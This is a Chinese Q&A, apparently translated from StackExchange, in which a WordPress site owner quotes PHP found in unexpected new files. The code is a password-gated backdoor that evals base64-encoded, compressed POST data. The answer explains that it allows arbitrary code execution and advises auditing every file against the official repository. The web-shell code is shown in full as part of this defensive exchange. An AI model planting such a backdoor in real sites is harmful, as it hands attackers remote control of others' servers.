在我的wordpress网站上,我发现了几个包含此php代码的全新文件:
if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;}
if(isset($_POST["key"]) && isset($_POST["chk"]) &&
$_POST["key"]=="long_strange_code")
eval(gzuncompress(base64_decode($_POST["chk"])));
这段代码在Wordpress中实际可以做什么?删除文件就足以解决问题?
在过去的几天里,由于mysql内存不足,该网站多次宕机。这可能是原因吗?
最合适的回答,由SO网友:Nathan Johnson 整理而成
这段代码在Wordpress中实际可以做什么?
此代码允许在服务器上任意执行PHP。
删除文件就足以解决问题?
您需要删除所有包含此类后门的文件。查看系统上的每个文件,并将其与WordPress存储库进行比较。
在过去的几天里,由于mysql内存不足,该网站多次宕机。这可能是原因吗?
对很可能有坏人在使用你的服务器进行恶行。